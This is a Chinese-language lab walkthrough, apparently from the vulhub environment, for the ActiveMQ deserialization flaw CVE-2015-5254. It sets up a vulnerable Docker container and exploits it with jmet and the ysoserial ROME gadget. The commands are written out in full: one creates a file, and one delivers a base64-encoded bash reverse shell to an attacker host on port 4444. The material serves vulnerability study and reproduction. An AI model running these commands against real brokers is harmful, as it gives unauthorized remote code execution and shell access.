ActiveMQ 反序列化漏洞（CVE-2015-5254）

漏洞原理

Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的信息中间件，他支持Java消息服务、集群、Spring Framework等。

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

cd /vulhub/activemq/CVE-2015-5254
docker-compose up -d

运行后，将监听61616和8161两个端口。其中61616是工作端口，消息在这个端口进行传递；8161是Web管理页面端口。访问http://10.10.10.10:8161即可看到web管理页面，不过这个漏洞理论上是不需要web的。

漏洞复现

漏洞利用过程如下：

构造（可以使用ysoserial）可执行命令的序列化对象
作为一个消息，发送给目标61616端口
访问web管理页面，读取消息，触发漏洞

使用jmet进行漏洞利用。首先下载jmet的jar文件，并在同目录下创建一个external文件夹（否则可能会爆文件夹不存在的错误）。
jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再自己下载），所以我们需要再ysoserial是gadget中选择一个可以使用的，比如ROME。
执行：

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

<!-- -Q指定队列消息名，-I选择要装载的JMS客户端，这里是ActiveMQ,-s是选择ysoserial payload，-Y指定具体的命令，-Yp指定payload类型，其后分别是ActiveMQ所在机器的ip及工作端口，所以这条命令是使用ROME payload把执行 touch/success命令序列化后作为名为event的信息发送给ActiveMQ -->

执行此处命令后会给目标ActiveMQ加一个名为event的队列，可通过点击事件，触发远程命令。此时进入容器docker-compose exec activemq bash，可见/tmp/success已经成功创建，说明漏洞利用成功：

反弹shell

将bash -i >& /dev/tcp/10.10.10.128/4444 0>&1编码base64
使用命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 10.10.10.10 61616